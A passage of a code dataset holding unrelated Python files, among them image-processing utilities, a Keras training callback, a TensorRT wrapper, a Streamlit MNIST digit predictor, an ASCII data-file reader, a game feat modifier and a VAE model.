gamma_correction(self, _path: str, _gamma: float, _outpath='./'):\n        \"\"\"\n        Performs gamma correction.\n        :param _path: Path of the image to correct.\n        :param _gamma: Gamma value.\n        :param _outpath: Output folder\n        :return:\n        \"\"\"\n        img = cv2.imread(_path, 0)\n        img_gamma = np.zeros_like(img, dtype='uint16')\n        m = img.max()\n        for h in tqdm(range(img.shape[0])):\n            for w in range(img.shape[1]):\n                img_gamma[h][w] = m * pow(img[h][w] / m, 1 / _gamma)\n        # res = np.hstack((img, img_gamma))\n        # cv2.imshow('corrected.', res)\n        # cv2.waitKey(0)\n        output_img = ''.join(_path.split('/')[-1].split('.')[0:-1]) + '_' + str(_gamma) + '.png'\n        if self.c.folder_check(_outpath):\n            cv2.imwrite(os.path.join(_outpath, output_img), img_gamma)\n\n    def extract_imgs(self, _h: int, _w: int, _path: str, _outpath='./'):\n        \"\"\"\n        Splits an image into fixed-size patches.\n        :param _h: Height of each patch.\n        :param _w: Width of each patch.\n        :param _path: Path of the image to split.\n        :param _outpath: Path of the folder where the patches are saved.\n        :return:\n        \"\"\"\n        img = cv2.imread(_path, 0)\n        if img.shape[0] % _h != 0 or img.shape[1] % _w != 0:\n            print('[Warn] Image cannot be divided evenly by _w or _h.')\n            exit(1)\n        if not self.c.folder_check(_outpath):\n            exit(1)\n        for ew in range(0, len(img[1]), _w):\n            for eh in range(0, len(img[0]), _h):\n                extracted_patch = img[eh:eh + _h - 1, ew:ew + _w - 1]\n                cv2.imwrite(os.path.join(_outpath, _path.split('/')[-1].split('.')[0] + '_extpatch_h' + str(eh) + '_w' + str(ew) + '.png'), extracted_patch)\n\n    def extract_img(self, _s: list, _h: int, _w: int, _path: str, _outpath='./'):\n        \"\"\"\n        Crops a single image out of the source image.\n        :param _s: Starting position of the crop (a list, [x, y])\n        :param _h: Height of the cropped image\n        :param _w: Width of the cropped image\n        :param _path: Path of the source image\n        :param _outpath: Path of the output folder\n        :return:\n        \"\"\"\n        if len(_s) != 2:\n            print('_s must be list as [x, y].')\n            exit(1)\n        img = cv2.imread(_path, 0)\n        ext_img = img[_s[0]:_s[0] + _h, _s[1]:_s[1] + _w]\n        if self.c.folder_check(_outpath):\n            cv2.imwrite(os.path.join(_outpath, _path.split('/')[-1].split('.')[0] + '_ext_h' + str(_h) + '_w' + str(_w) + '.png'), ext_img)\n\n    def extract_random_img(self, _num: int, _h: int, _w: int, _path: str, _outpath='./'):\n        \"\"\"\n        Randomly crops a number of fixed-size images from the given image.\n        :param _num: Number of images to crop\n        :param _h: Height of each cropped image\n        :param _w: Width of each cropped image\n        :param _path: Path of the image file to crop from\n        :param _outpath: Path of the output folder\n        :return:\n        \"\"\"\n        import random\n        img = cv2.imread(_path, 0)\n        for count in range(0, _num):\n            width = random.randint(0, len(img[0, :]) - _w)\n            height = random.randint(0, len(img[:, 0]) - _h)\n            ext_img = img[height:height + _h, width:width + _w]\n            if self.c.folder_check(_outpath):\n                cv2.imwrite(os.path.join(_outpath, str(count) + '.png'), ext_img)\n\n    def erosion(self, _img: np.array, _kernel_size: int):\n        \"\"\"\n        Erodes the input image.\n        :param _img: Image to erode (ndarray)\n        :param _kernel_size: Kernel size for the erosion\n        :return:\n        \"\"\"\n        kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n        return cv2.erode(_img, kernel, iterations=1)\n\n    def dilation(self, _img: np.ndarray, _kernel_size: int):\n        \"\"\"\n        Dilates the input image.\n        :param _img:\n        :param _kernel_size:\n        :return:\n        \"\"\"\n        kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n        return cv2.dilate(_img, kernel, iterations=1)\n\n    def opening(self, _img: np.ndarray, _kernel_size: int):\n        \"\"\"\n        Applies opening (erosion followed by dilation) to the input image.\n        Effective at removing white noise.\n        :param _img:\n        :param _kernel_size:\n        :return:\n        \"\"\"\n        kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n        return cv2.morphologyEx(_img, cv2.MORPH_OPEN, kernel)\n\n    def closing(self, _img: np.ndarray, _kernel_size: int):\n        \"\"\"\n        Applies closing (dilation followed by erosion) to the input image.\n        Effective at removing noise inside objects.\n        :param _img:\n        :param _kernel_size:\n        :return:\n        \"\"\"\n        kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n        return cv2.morphologyEx(_img, cv2.MORPH_CLOSE, kernel)\n\n    def ma_filter(self):\n        pass\n\n    def skeltonize(self, _img: np.ndarray):\n        \"\"\"\n        Skeletonizes (thins) the input image.\n        :param _img: Image to skeletonize\n        :return:\n        \"\"\"\n        import matplotlib.pyplot as plt\n        img = morphology.skeletonize(_img)\n        plt.imsave('skel.png', img)\n        return img\n","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"34491222","text":"__author__ = 'jpries1'\n\nimport pandas as pd\n\n# Monthly Income peercodes\nmi_peers = pd.read_csv(r'C:/svn/base/trunk/utils/groups_data/mi_peercodes.csv')\nmi_peers = dict(zip(\n    set(mi_peers['FUND'].values),\n    [list(mi_peers.loc[mi_peers['FUND'] == f, 'PEERCODE'].values) for f in set(mi_peers['FUND'].values)]\n))\n\nfees = {\n    'Balanced': 0.0216,\n    'Conservative': 0.0175\n}\n\nmorningstar = {\n    'Balanced': 
'F00000VAU9',\n 'Conservative': 'F00000VAUN'\n}\n","sub_path":"research/utils/mthlyinc_params.py","file_name":"mthlyinc_params.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352906059","text":"import keras\nimport keras.backend as K\nimport numpy as np\nimport time\nimport tensorflow as tf\nfrom keras.models import load_model\nfrom keras import optimizers\nimport build_model\n\nclass callmodel(keras.callbacks.Callback):\n def __init__(self, inputs=None, outputs=None, *kargs, **kwargs):\n super(callmodel, self).__init__(*kargs, **kwargs)\n self.inputs = inputs\n self.outputs = outputs\n \n def on_epoch_begin(self, epoch, logs={}):\n def get_layer_output_grad(model, inputs, outputs, layer):\n \"\"\" Gets gradient a layer output for given inputs and outputs\"\"\"\n grads = model.optimizer.get_gradients(model.total_loss, model.layers[layer].output)\n symb_inputs = (model._feed_inputs + model._feed_targets + model._feed_sample_weights)\n f = K.function(symb_inputs, grads)\n x, y, sample_weight = model._standardize_user_data(inputs, outputs)\n output_grad = f(x + y + sample_weight)\n return output_grad\n \n ##############################h_value#######################################\n if epoch ==49:\n K.set_value(self.model.optimizer.add_ah, np.array(0.))\n elif epoch == 20:\n mmodel = build_model.build_model()\n mmodel.set_weights(self.model.get_weights())\n sgd = optimizers.SGD_test(add_ah=0., add_noise=0., h_corr=np.zeros([12,512,512]),a_corr=np.zeros([12,512,512]), lr=0.001, momentum=0.9, nesterov=True)\n mmodel.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])\n \n index_input = [np.random.randint(0,50000) for _ in range(100)]\n cov = []\n for l_i in [4, 8, 11, 14]:\n h_value = get_layer_output_grad(mmodel, [self.inputs[index_input,:]], [self.outputs[index_input,:]], l_i)[0]\n h_value = h_value.reshape(h_value.shape[0]*h_value.shape[1]*h_value.shape[2],-1)\n h_value = np.mean(h_value,axis=0)\n cov.append(h_value)\n for ii in range(8):\n cov.append(h_value)\n h_corr = []\n for l_i in range(len(cov)):\n split_data = 64\n zz = np.zeros([512,512])\n for i in range(int(len(cov[l_i])/split_data)):\n z = np.kron(cov[l_i][i*split_data:i*split_data+split_data], np.array([cov[l_i][i*split_data:i*split_data+split_data]]).reshape(-1,1))\n z = z / (z.max(axis=1).reshape(-1,1)+0.0001) + np.random.normal(loc=0.0, scale=0.2, size=(split_data,split_data))\n z = np.linalg.inv(z)\n z = z * (-np.ones([len(z),len(z)]) + 2*np.eye(len(z), dtype=float))\n #z = np.abs(z) \n z = z / np.abs(z).sum(axis=1).reshape(-1,1)\n if not np.isnan(np.min(z)):\n zz[i*split_data:i*split_data+split_data,i*split_data:i*split_data+split_data] = z\n else:\n zz[i*split_data:i*split_data+split_data,i*split_data:i*split_data+split_data] = np.eye(split_data, dtype=float)\n h_corr.append(zz)\n K.set_value(self.model.optimizer.h_corr, np.array(h_corr))\n \n\n ","sub_path":"Experiment_5.3/AlexNet_ImageNet32/callmodel.py","file_name":"callmodel.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"233929229","text":"import queue\nimport math\ndef bfs(n,burn):\n toexplore = queue.PriorityQueue()\n toexplore.put(-1*n)\n a1=-1\n a2=-1\n for i in range(burn):\n a = toexplore.get()\n a = -1*a\n if a%2 == 0:\n a1 = a//2\n a2 = a1-1\n else:\n a1 = a//2\n a2 = a//2\n toexplore.put(-1*a1)\n toexplore.put(-1*a2)\n return 
(a1,a2)\ndef log(n, burn2):\n if burn2 ==0:\n b = 0\n else:\n b = int(math.log(burn2,2))\n toexplore = [n]\n for i in range(b):\n newexplore = []\n for a in toexplore:\n if a % 2 == 0:\n a1 = a // 2\n a2 = a1 - 1\n else:\n a1 = a // 2\n a2 = a // 2\n newexplore.append(a1)\n newexplore.append(a2)\n toexplore=newexplore\n lol = burn2-2**b\n ans = sorted(toexplore, reverse=True)\n ans = ans[lol]\n if ans % 2 == 0:\n a3 = ans // 2\n a4 = a3 - 1\n else:\n a3 = ans // 2\n a4 = ans // 2\n return(a3, a4)\na = open('test.txt', 'r')\nfirst = True\ncounter = 1\nb = open(\"out.txt\", \"w\")\nfor i in a:\n if first:\n t = int(i.strip())\n first = False\n else:\n n,k = [int(j) for j in i.strip().split()]\n burn = k\n #ans2 = bfs(n, burn)\n ans2 = log(n,burn)\n print(counter)\n b.write(\"Case #\" + str(counter) + \": \" + str(ans2[0])+\" \"+ str(ans2[1]) + \"\\n\")\n counter+=1\na.close()\nb.close()","sub_path":"code_jam/2017/3rdproblem.py","file_name":"3rdproblem.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536185635","text":"import numpy as np\nfrom config import cnf\nimport keras\n\ndata_cnf = cnf.Coffee()\n\ndef load_data(data_set):\n\tdatadir = '/home/zywang/Downloads/CNN_tsc-master/UCR_TS_Archive_2015/'+ data_set + '/' + data_set\n\t#datadir = '/home/zywang/Downloads/CNN_tsc-master/Elec_10/Elec-5-size/'+ data_set + '/' + data_set\n\tdata_test = np.loadtxt(datadir+'_TEST',delimiter=',')\n\tdata_train = np.loadtxt(datadir+'_TRAIN',delimiter=',')\n\tX_train = data_train[:,1:]\n\ty_train = data_train[:,0]\n\n\tX_test = data_test[:,1:]\n\ty_test = data_test[:,0]\n\n\tbase = np.min(y_train) #Check if data is 0-based\n\t\n\tif base == -1:\n\t for i in range(len(y_train)):\n\t if y_train[i] == -1:\n\t \ty_train[i] = 0\n\t for i in range(len(y_test)):\n\t \tif y_test[i] == -1:\n\t \t\ty_test[i] = 0\n\n\telif base != 0:\n\t y_train -=base\n\t y_test -= base\n\n\tX_train = X_train.reshape(-1,1,data_cnf.FEATURE_LEN,1)\n\ty_train = keras.utils.to_categorical(y_train)\n\n\tX_test = X_test.reshape(-1,1,data_cnf.FEATURE_LEN,1)\n\ty_test = keras.utils.to_categorical(y_test)\n\n\treturn X_train, y_train, X_test, y_test\n\ndef get_one_sample(data_set):\n\tdatadir = '/home/zywang/Downloads/CNN_tsc-master/UCR_TS_Archive_2015/'+ data_set + '/' + data_set\n\t#datadir = '/home/zywang/Downloads/CNN_tsc-master/Elec_10/Elec-5-size/'+ data_set + '/' + data_set\n\tdata_test = np.loadtxt(datadir+'_TEST',delimiter=',')\n\tX_test = data_test[:,1:]\n\ttest_sample = X_test[1]\n\n\treturn test_sample","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"527517787","text":"import streamlit as st\nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torchvision.utils import save_image\nfrom PIL import Image\nimport os\n\nclass SlimAlexNet(nn.Module):\n def __init__(self, num_classes=10):\n super().__init__()\n self.features = nn.Sequential(\n nn.Conv2d(1,32,kernel_size = 3, stride =1),\n nn.ReLU(inplace = True),\n nn.MaxPool2d(kernel_size =3, stride = 2),\n nn.Conv2d(32,64,kernel_size = 3),\n nn.ReLU(inplace = True),\n nn.MaxPool2d(kernel_size =3, stride = 2),\n nn.Conv2d(64,128,kernel_size = 3, padding =1),\n nn.ReLU(inplace = True),\n nn.Conv2d(128,256,kernel_size = 3, padding =1),\n 
nn.ReLU(inplace = True),\n nn.Conv2d(256,128,kernel_size = 3, padding =1),\n nn.ReLU(inplace = True),\n nn.MaxPool2d(kernel_size =3, stride = 2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(128,1024),\n nn.ReLU(inplace= True),\n nn.Dropout(),\n nn.Linear(1024,1024),\n nn.ReLU(inplace= True),\n nn.Linear(1024,num_classes)\n )\n def forward(self,x):\n x = self.features(x)\n x = x.flatten(start_dim=1)\n x = self.classifier(x)\n return x \n \ndef predict(im):\n inputs = transform(im)\n inputs = inputs.to(device)\n results = net(inputs.unsqueeze(0)).argmax(dim=1).to('cpu').numpy() \n return results[0]\n\n\ntransform = transforms.Compose([transforms.ToTensor()])\nnet = SlimAlexNet(num_classes=10)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nnet.to(device)\nnet.load_state_dict(torch.load('best_model.pt', map_location=lambda storage, loc: storage))\n\n\n\n#streamlit start\nst.title(\"Welcome to Handwritten Digits Preditor\")\nst.markdown(\"This application is a Streamlit dashboard that can be used \"\n \"to predict 0-9 🗽💥🚗\")\n\ninput_buffer = st.file_uploader(\"Upload a handwritten digit\", type=(\"png\", \"jpg\"))\n\nif st.button(\"Predict\"): \n im = Image.open(input_buffer).convert('L')\n im = im.resize((28,28),Image.NEAREST)\n result = predict(im)\n rsl = 'Congratulations! Your uploaded digit predicted as: %d'%result\n st.text(rsl)\n st.balloons()\n\n \n\n \n\n\n\n\n\n","sub_path":"mnist_streamlit.py","file_name":"mnist_streamlit.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"378941533","text":"#first way.........possible in all lang\na = int(input(\"Enter A:\"))\nb = int(input(\"Enter B:\"))\n\na = a+b\nb =a-b\na =a-b\nprint(\"First Method...1\")\nprint(\"A:{} and B:{}\".format(a,b))\n\n#second way.......Only in python lang possible\nprint(\"Second Method...2\")\na,b = b,a\nprint(\"A:{} and B:{}\".format(a,b))\n\n","sub_path":"swap_logic.py","file_name":"swap_logic.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515679616","text":"#\n# Copyright (c) 2021, NVIDIA CORPORATION. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#          http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ~~~Medcare AI Lab~~~\n# Code source: https://github.com/NVIDIA/trt-samples-for-hackathon-cn/blob/master/python/ (only minor modifications made)\n\nfrom functools import reduce\nimport tensorrt\nimport torch\nimport numpy as np\n\nclass TrtLite:\n    def __init__(self, build_engine_proc = None, build_engine_params = None, engine_file_path = None):\n        logger = tensorrt.Logger(tensorrt.Logger.INFO)\n        if engine_file_path is None:\n            with tensorrt.Builder(logger) as builder:\n                if build_engine_params is not None:\n                    self.engine = build_engine_proc(builder, *build_engine_params)\n                else:\n                    self.engine = build_engine_proc(builder)\n        else:\n            with open(engine_file_path, 'rb') as f, tensorrt.Runtime(logger) as runtime:\n                self.engine = runtime.deserialize_cuda_engine(f.read())\n        self.context = self.engine.create_execution_context()\n    \n    def __del__(self):\n        self.engine = None\n        self.context = None\n        print(\"[INFO] Releasing model\")\n    \n    def save_to_file(self, engine_file_path):\n        with open(engine_file_path, 'wb') as f:\n            f.write(self.engine.serialize())\n    \n    def get_io_info(self, input_desc):\n        def to_numpy_dtype(trt_dtype):\n            tb = {\n                tensorrt.DataType.BOOL: np.dtype('bool'),\n                tensorrt.DataType.FLOAT: np.dtype('float32'),\n                tensorrt.DataType.HALF: np.dtype('float16'),\n                tensorrt.DataType.INT32: np.dtype('int32'),\n                tensorrt.DataType.INT8: np.dtype('int8'),\n            }\n            return tb[trt_dtype]\n\n        if isinstance(input_desc, dict):\n            if self.engine.has_implicit_batch_dimension:\n                print('Engine was built with static-shaped input so you should provide batch_size instead of i2shape')\n                return\n            i2shape = input_desc\n            for i, shape in i2shape.items():\n                self.context.set_binding_shape(i, shape)\n            return [(self.engine.get_binding_name(i), self.engine.binding_is_input(i), \n                tuple(self.context.get_binding_shape(i)), to_numpy_dtype(self.engine.get_binding_dtype(i))) for i in range(self.engine.num_bindings)]\n        \n        batch_size = input_desc\n        return [(self.engine.get_binding_name(i), \n            self.engine.binding_is_input(i), \n            (batch_size,) + tuple(self.context.get_binding_shape(i)), \n            to_numpy_dtype(self.engine.get_binding_dtype(i))) for i in range(self.engine.num_bindings)]\n    \n    def allocate_io_buffers(self, input_desc, on_gpu):\n        io_info = self.get_io_info(input_desc)\n        if io_info is None:\n            return\n        if on_gpu:\n            cuda = torch.device('cuda')\n            np2pth = {\n                np.dtype('bool'): torch.bool,\n                np.dtype('float32'): torch.float32,\n                np.dtype('float16'): torch.float16,\n                np.dtype('int32'): torch.int32,\n                np.dtype('int8'): torch.int8,\n            }\n            return [torch.empty(i[2], dtype=np2pth[i[3]], device=cuda) for i in io_info]\n        else:\n            return [np.zeros(i[2], i[3]) for i in io_info]\n\n    def execute(self, bindings, input_desc, stream_handle = 0, input_consumed = None):\n        if isinstance(input_desc, dict):\n            i2shape = input_desc\n            for i, shape in i2shape.items():\n                self.context.set_binding_shape(i, shape)\n            self.context.execute_async_v2(bindings, stream_handle, input_consumed)\n            return\n        \n        batch_size = input_desc\n        
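# A dict input_desc means explicit (dynamic) shapes and goes through\n        # execute_async_v2 above; a plain integer is taken as the batch size for\n        # implicit-batch engines and dispatched via execute_async below.\n        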
self.context.execute_async(batch_size, bindings, stream_handle, input_consumed)\n\n def print_info(self):\n print(\"Batch dimension is\", \"implicit\" if self.engine.has_implicit_batch_dimension else \"explicit\")\n for i in range(self.engine.num_bindings):\n print(\"input\" if self.engine.binding_is_input(i) else \"output\", \n self.engine.get_binding_name(i), self.engine.get_binding_dtype(i), \n self.engine.get_binding_shape(i), \n -1 if -1 in self.engine.get_binding_shape(i) else reduce(\n lambda x, y: x * y, self.engine.get_binding_shape(i)) * self.engine.get_binding_dtype(i).itemsize)","sub_path":"trt_util/trt_lite.py","file_name":"trt_lite.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"172006979","text":"# -*- coding: utf-8 -*-\n# datafile/asciifile.py\n\nfrom __future__ import absolute_import # PEP328\nimport codecs\nfrom abc import ABCMeta, abstractmethod\nfrom numpy import array as np_array\nfrom datafile import DataFile\nfrom utils.error import FileError\nfrom utils import isString, isWindows, mcopen\nfrom future.utils import with_metaclass\n\nclass AsciiFile(with_metaclass(ABCMeta, DataFile)):\n \"\"\"A generic ascii data file.\"\"\"\n valueFormat = \"{0: 14.6E}\" # format of data values for ascii export\n separator = \" \"\n newline=\"\\n\"\n\n # helpers for writing\n\n @classmethod\n def formatValue(cls, value):\n try:\n return cls.valueFormat.format(value)\n except ValueError:\n return \"{0}\".format(value)\n\n @classmethod\n def formatRow(cls, row, **kwargs):\n return cls.separator.join([cls.formatValue(value) for value in row])\n\n @classmethod\n def formatData(cls, data, **kwargs):\n return cls.newline.join([cls.formatRow(row, **kwargs)\n for row in data])\n\n @staticmethod\n def _write(filename, mode, asciiData):\n with mcopen(filename, mode) as fd:\n fd.write(asciiData)\n\n @classmethod\n def writeFile(cls, filename, data, **kwargs):\n cls._write(filename, 'w', cls.formatData(data, **kwargs))\n\n @classmethod\n def appendFile(cls, filename, data, **kwargs):\n \"\"\"like writeFile but appends data to an existing file\"\"\"\n cls._write(filename, 'a', cls.formatData(data, **kwargs))\n\n @classmethod\n def _formatHeader(cls, header):\n if not isString(header):\n header = cls.separator.join(header)\n header += cls.newline\n return header\n\n @classmethod\n def writeHeaderLine(cls, filename, header):\n \"\"\"writes a single-line header to a file consisting of a string or\n tuple of strings to be joined\"\"\"\n cls._write(filename, 'w', cls._formatHeader(header))\n\n @classmethod\n def appendHeaderLine(cls, filename, header):\n \"\"\"writes a single-line header to a file consisting of a string or\n tuple of strings to be joined\"\"\"\n cls._write(filename, 'a', cls._formatHeader(header))\n\n # helpers for reading\n\n def readTuple(self, fields, dataType = float, **kwargs):\n \"\"\"Converts each field to the requested datatype.\n Raises an error if it is incompatible,\n the line is skipped in that case.\"\"\"\n try:\n # just converted to tuple\n return tuple((dataType(f) for f in fields))\n except:\n raise ValueError\n\n def readFile(self, **kwargs):\n asciiLines = None\n try:\n with mcopen(self.filename, 'r') as fd:\n asciiLines = fd.readlines()\n except UnicodeDecodeError:\n with mcopen(self.filename, 'r', encoding = 'latin1') as fd:\n asciiLines = fd.readlines()\n self.parseLines(asciiLines, **kwargs)\n\n @abstractmethod\n def parseLines(self, asciiLines, **kwargs):\n 
\"\"\"Parses lines of an ASCII file in order to extract a single array\n of numbers. Reimplement this in subclasses for different behaviour.\n \"\"\"\n raise NotImplementedError\n\n def readArray(self, asciiLines, dataType = float,\n startLine = 0, endLine = None, **kwargs):\n \"\"\"Reads a numpy.array from a specified segment (startLine, endLine)\n of a line buffer given by asciiLines. Stops at lines incompatible\n to previous lines read due to different number of fields or\n incompatible data type. Returns the last line successfully parsed and\n the populated numpy.array.\n \"\"\"\n recordList = []\n for linenr, line in enumerate(asciiLines[startLine:endLine]):\n linenr += startLine\n # strip trailing white space, replace decimal operators \n # eventually, split data fields\n # we read floating point numbers only\n if '.' in line:\n line = line.replace(\",\",\" \") # comma separated\n else: # no points in line\n # convert D/A/CH decimal separator to point\n line = line.replace(\",\",\".\")\n fields = (line.strip()\n .replace(\";\",\" \")\n .split())\n record = None\n try:\n # may raise exception\n record = self.readTuple(fields, lineNumber = linenr,\n dataType = dataType)\n if not len(record): # ignore empty tuples\n record = None\n except ValueError:\n pass # ignore it for now, record == None\n if record is None: # on parse failure of current line\n if not len(recordList):\n continue # if still no compatible data found\n else:\n break # data listing ends here\n elif len(recordList) and len(recordList[-1]) != len(record):\n break # do not append records of different size\n recordList.append(record)\n\n endLine = linenr - 1 # could not read last line\n recordCount = len(recordList)\n if recordCount <= 0:\n raise FileError(\"No data columns found!\", self.filename)\n return endLine, np_array(recordList, dataType)\n\n# vim: set ts=4 sts=4 sw=4 tw=0: \n","sub_path":"datafile/asciifile.py","file_name":"asciifile.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53929334","text":"from peterbecom.base.basecommand import BaseCommand\nfrom peterbecom.base.songsearch_autocomplete import insert\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n default=False,\n help=\"Print instead of deleting\",\n )\n parser.add_argument(\n \"--impatient\",\n action=\"store_true\",\n default=False,\n help=\"Exit on errors immediately\",\n )\n\n def _handle(self, **options):\n dry_run = options[\"dry_run\"]\n impatient = options[\"impatient\"]\n insert(dry_run=dry_run, impatient=impatient)\n","sub_path":"peterbecom/base/management/commands/insert-songsearch-autocomplete.py","file_name":"insert-songsearch-autocomplete.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539191312","text":"from templeplus.pymod import PythonModifier\nfrom toee import *\nimport tpdp\nimport char_class_utils\nimport d20_action_utils\n\ndef SpeedOfThought(attachee, args, evt_obj):\n isFocused = attachee.d20_query(\"Psionically Focused\") # Character must be psionically focused\n if not isFocused:\n return 0\n\n armor = obj.item_worn_at(5) # Character must not be wearing heavy armor\n if armor != OBJ_HANDLE_NULL:\n armorFlags = armor.obj_get_int(obj_f_armor_flags)\n if armorFlags == ARMOR_TYPE_HEAVY:\n return 0\n \n evt_obj.bonus_list.add_from_feat(10, 41, 114, 
\"Speed of Thought\") # Add 10 insight bonus to move speed\n #evt_obj.return_val += 10\n return 0\n\nfeat_speed_of_thought = PythonModifier(\"feat_speed_of_thought\", 1)\nfeat_speed_of_thought.AddHook(ET_OnGetMoveSpeed, EK_NONE, SpeedOfThought, ())\nfeat_speed_of_thought.MapToFeat(\"Speed of Thought\")\n","sub_path":"data.old/scr/tpModifiers/feat_speed_of_thought.py","file_name":"feat_speed_of_thought.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488389851","text":"import os, sys, enum\nfrom os import path\n\nclass entry_info:\n\tdef __init__(self, name, parent, path, parent_path):\n\t\tself.__name = name\n\t\tself.__parent = parent\n\t\tself.__path = path\n\t\tself.__parent_path = parent_path\n\n\tdef __repr__(self):\n\t\treturn '(name={}, parent={}, path={}, parent_path={})'.format(\n\t\t\tself.__name, self.__parent, self.__path, self.__parent_path\n\t\t)\n\n\tname = property(lambda self: self.__name)\n\tparent = property(lambda self: self.__parent)\n\tpath = property(lambda self: self.__path)\n\tparent_path = property(lambda self: self.__parent_path)\n\nclass config_type(enum.Enum):\n\tapplication = 1,\n\tstatic_lib = 2,\n\tdynamic_lib = 3\n\n\n\nclass project:\n\tdef __init__(self, name, platform, root_dir, include_dir, ext_include_dir, source_dir, target_dir, project_dir, type = config_type.application):\n\t\tself.name = name\n\t\tself.platform = platform\n\t\tself.root_dir = root_dir\n\t\tself.include_dir = include_dir\n\t\tself.ext_include_dir = ext_include_dir\n\t\tself.source_dir = source_dir\n\t\tself.target_dir = target_dir\n\t\tself.type = type\n\t\tself.project_dir = project_dir\n\n\tdef _iter_files(self, dir):\n\t\tos.chdir(self.root_dir)\n\t\tstack = [dir]\n\t\twhile stack:\n\t\t\tcur = stack.pop()\n\t\t\tentries = os.listdir(cur)\n\t\t\tif path.basename(cur) == 'platform':\n\t\t\t\tif path.isdir(path.join(cur, self.platform)):\n\t\t\t\t\tstack.append(path.join(cur, self.platform))\n\t\t\telse:\n\t\t\t\tstack += filter(path.isdir, (path.join(cur, e) for e in entries))\n\t\t\tfor entry in entries:\n\t\t\t\tif path.isfile(path.join(cur, entry)):\n\t\t\t\t\tyield entry_info(name=entry, parent=path.basename(cur), path=path.join(cur, entry), parent_path=cur)\n\n\tdef _iter_dirs(self, dir):\n\t\tos.chdir(self.root_dir)\n\t\tstack = [dir]\n\t\twhile stack:\n\t\t\tcur = stack.pop()\n\t\t\tentries = list(filter(path.isdir, (path.join(cur, entry) for entry in os.listdir(cur))))\n\t\t\tif cur == 'platform':\n\t\t\t\tif path.isdir(path.join(cur, self.platform)):\n\t\t\t\t\tyield entry_info(name=self.platform, parent=path.basename(cur), path=path.join(cur, self.platform), parent_path=cur)\n\t\t\t\t\tstack.append(path.join(cur, self.platform))\n\t\t\telse:\n\t\t\t\tfor entry in filter(path.isdir, entries):\n\t\t\t\t\tyield entry_info(name=path.basename(entry), parent=path.basename(cur), path=entry, parent_path=cur)\n\t\t\t\t\tstack.append(entry)\n\n\tdef iter_includes(self):\n\t\treturn self._iter_files(self.include_dir)\n\n\tdef iter_sources(self):\n\t\treturn self._iter_files(self.source_dir)\n\n\tdef iter_include_dirs(self):\n\t\treturn self._iter_dirs(self.include_dir)\n\n\tdef iter_source_dirs(self):\n\t\treturn self._iter_dirs(self.source_dir)\n\n\tdef root_relative(self, target_path):\n\t\treturn path.relpath(target_path, self.root_dir)\n\n\tdef project_relative(self, target_path):\n\t\treturn path.relpath(target_path, 
self.project_dir)\n\n","sub_path":"setup/py/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387909805","text":"import torch\nfrom torch import nn\n\nfrom neural.layers import Flatten, Reshape\n\nclass VAE2(nn.Module):\n def __init__(self):\n super(VAE2, self).__init__()\n\n # ENCODER\n self.e_conv1 = nn.Conv2d(3, 32, 16, 10)\n self.e_bn1 = nn.BatchNorm2d(32)\n self.e_relu1 = nn.ReLU()\n self.e_flatten = Flatten()\n self.mu_fc = nn.Linear(2592, 1000)\n self.logvar_fc = nn.Linear(2592, 1000)\n\n \n # DECODER\n self.d_lin = nn.Linear(1000, 2592)\n self.d_reshape = Reshape((32, 9, 9))\n self.d_relu1 = nn.ReLU()\n self.convt1 = nn.ConvTranspose2d(32, 16, kernel_size = 3, stride = 3)\n self.d_relu2 = nn.ReLU()\n self.d_bn1 = nn.BatchNorm2d(16)\n self.convt2 = nn.ConvTranspose2d(16, 3, kernel_size = 4, stride = 4)\n self.d_relu3 = nn.ReLU()\n self.d_bn2 = nn.BatchNorm2d(3)\n\n\n def encode(self, x):\n x = self.e_conv1(x)\n x = self.e_bn1(x)\n x = self.e_relu1(x)\n self.pre_flatten = x.shape\n x = 